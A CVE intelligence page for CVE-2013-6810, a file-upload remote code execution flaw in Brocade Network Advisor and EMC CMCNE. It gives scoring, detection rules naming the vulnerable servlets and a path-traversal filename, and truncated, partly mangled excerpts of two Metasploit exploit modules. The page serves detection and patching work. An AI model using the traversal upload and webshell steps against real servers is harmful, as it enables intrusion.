CVE-2013-6810
published 2013-12-12CVE-2013-6810: The server in Brocade Network Advisor before 12.1.0, as used in EMC Connectrix Manager Converged Network Edition (CMCNE), HP B-series SAN Network Advisor, and…
PriorityP272critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
17.00%
96.7th percentile
The server in Brocade Network Advisor before 12.1.0, as used in EMC Connectrix Manager Converged Network Edition (CMCNE), HP B-series SAN Network Advisor, and possibly other products, allows remote attackers to execute arbitrary code by using a servlet to upload an executable file.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| emc | connectrix_manager | — | — |
| emc | connectrix_manager | — | — |
| emc | connectrix_manager | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect multipart POST requests to /inmservlets/FileUploadController with a custom 'ROOTDIR' HTTP header set to 'ftproot' and a filename parameter containing path traversal sequences targeting the deploy directory. ↗
- →Detect multipart POST requests to /HttpFileUpload/FileUploadController.do where the uploaded filename field contains directory traversal sequences (e.g., '..\..\..\deploy\dcm-client.war\'). ↗
- →Alert on HTTP 200 responses containing the string 'SUCCESSFULLY UPLOADED FILES!' from the target servlets, indicating a successful malicious file upload. ↗
- →Monitor for subsequent GET requests to /dcm-client/*.jsp immediately after a POST to the FileUploadController endpoints, indicating payload execution of an uploaded JSP webshell. ↗
- ·The exploit targets port 80 by default, but the actual Brocade Network Advisor / EMC CMCNE deployment may run on a different port; detections should not be limited to port 80 alone. ↗
- ·The uploaded JSP filename is randomly generated (4–32 alphanumeric characters) per exploit run, so filename-based detections must use a pattern match (e.g., regex for random alphanum + .jsp in /dcm-client/) rather than a static filename. ↗
- ·Two distinct servlet endpoints are exploited across the two PoC modules (inmservlets/FileUploadController vs HttpFileUpload/FileUploadController.do); both must be covered in detection rules. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
exploitdb·2017-09-13
CVE-2013-6810 EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)
---
require 'msf/core'
class MetasploitModule 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a file upload vulnerability found in EMC
Connectrix Manager Converged Network Edition [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '13-280' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-
Exploit-DB
EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
exploitdb·2017-09-13
CVE-2013-6810 EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)
---
require 'msf/core'
class MetasploitModule 'EMC CMCNE FileUploadController Remote Code Execution',
'Description' => %q{
This module exploits a fileupload vulnerability found in EMC
Connectrix Manager Converged Network Edition MSF_LICENSE,
'Author' => [ 'james fitts' ],
'References' =>
[
[ 'ZDI', '13-279' ],
[ 'CVE', '2013-6810' ]
],
'Privileged' => true,
'Platform' => 'win',
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2013'))
register_options([
Opt::RPORT(80)
], self.class)
end
def exploit
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
jsp = payload.encode
http://archives.neohapsis.com/archives/bugtraq/2013-12/0053.htmlhttp://marc.info/?l=bugtraq&m=138723620521347&w=2http://secunia.com/advisories/56143http://www.attrition.org/pipermail/vim/2014-January/002755.htmlhttp://www.securitytracker.com/id/1029485http://www.zerodayinitiative.com/advisories/ZDI-13-283/https://exchange.xforce.ibmcloud.com/vulnerabilities/90728https://www.exploit-db.com/exploits/42701/https://www.exploit-db.com/exploits/42702/http://archives.neohapsis.com/archives/bugtraq/2013-12/0053.htmlhttp://marc.info/?l=bugtraq&m=138723620521347&w=2http://secunia.com/advisories/56143http://www.attrition.org/pipermail/vim/2014-January/002755.htmlhttp://www.securitytracker.com/id/1029485http://www.zerodayinitiative.com/advisories/ZDI-13-283/https://exchange.xforce.ibmcloud.com/vulnerabilities/90728https://www.exploit-db.com/exploits/42701/https://www.exploit-db.com/exploits/42702/
2013-12-12
Published